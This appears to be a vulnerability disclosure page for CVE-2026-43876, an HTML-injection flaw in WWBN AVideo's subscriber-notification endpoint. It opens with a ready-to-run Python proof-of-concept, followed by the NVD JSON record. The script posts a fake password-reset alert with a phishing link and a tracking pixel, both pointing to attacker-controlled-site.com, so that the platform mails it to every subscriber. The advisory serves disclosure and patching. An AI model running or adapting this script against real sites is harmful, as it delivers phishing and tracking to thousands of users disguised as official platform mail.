CVE-2026-43876

import requests # Configuration target_url = "http://target-site/objects/notifySubscribers.json.php" # Attacker's session cookie (User must be authenticated with upload permissions) cookies = { "PHPSESSID": "valid_session_id_here" } # Malicious HTML Payload # This payload includes a phishing link and a tracking pixel html_payload = """ <div style="background-color:#f0f0f0;padding:20px;border:1px solid #ccc;"> <h2>Security Alert: Password Reset Required</h2> <p>Dear User,</p> <p>We detected suspicious activity. Please update your password immediately.</p> <a href="http://attacker-controlled-site.com/phishing" style="color:red;font-weight:bold;">Click here to Reset</a> <br><br> <!-- Tracking pixel to verify email delivery/opening --> <img src="http://attacker-controlled-site.com/track.png" width="1" height="1" alt=""> </div> """ # POST data to the vulnerable endpoint payload_data = { "message": html_payload, "subject": "Urgent: System Security Update", # other required parameters by the endpoint } try: response = requests.post(target_url, cookies=cookies, data=payload_data) if response.status_code == 200: print("[+] Payload sent successfully.") print("[+] Subscribers should have received the malicious email.") else: print(f"[-] Request failed with status code: {response.status_code}") print(response.text) except Exception as e: print(f"[-] An error occurred: {e}")

{"cve": {"id": "CVE-2026-43876", "sourceIdentifier": "[email protected]", "published": "2026-05-11T22:22:11.983", "lastModified": "2026-05-11T22:22:11.983", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "WWBN AVideo is an open source video platform. In versions up to and including 29.0, objects/notifySubscribers.json.php takes the raw message POST parameter and passes it into sendSiteEmail(), which substitutes it directly into an HTML email template (via str_replace on the {message} placeholder) and renders it with PHPMailer::msgHTML(). There is no HTML sanitization, character escaping, or output encoding on the attacker-controlled message between $_POST['message'] and the rendered email. Any authenticated user with upload permission can therefore broadcast arbitrary HTML — phishing links, tracking pixels, CSS/UI spoofing — to every subscriber on their channel (up to 10,000 recipients per invocation). The email is sent From: the platform's configured contact address and wrapped in the site's official logo and title, so attacker-supplied HTML arrives with the appearance of an official platform communication. Commit https://github.com/WWBN/AVideo/commit/ contains an updated fix."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N", "baseScore": 6.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.1, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://github.com/WWBN/AVideo/commit/078c4342eb9969a70425a9cdca3eefa7f8a86d53", "source": "[email protected]"}, {"url": "https://github.com/WWBN/AVideo/security/advisories/GHSA-g9cm-rxp7-6gv5", "source": "[email protected]"}]}}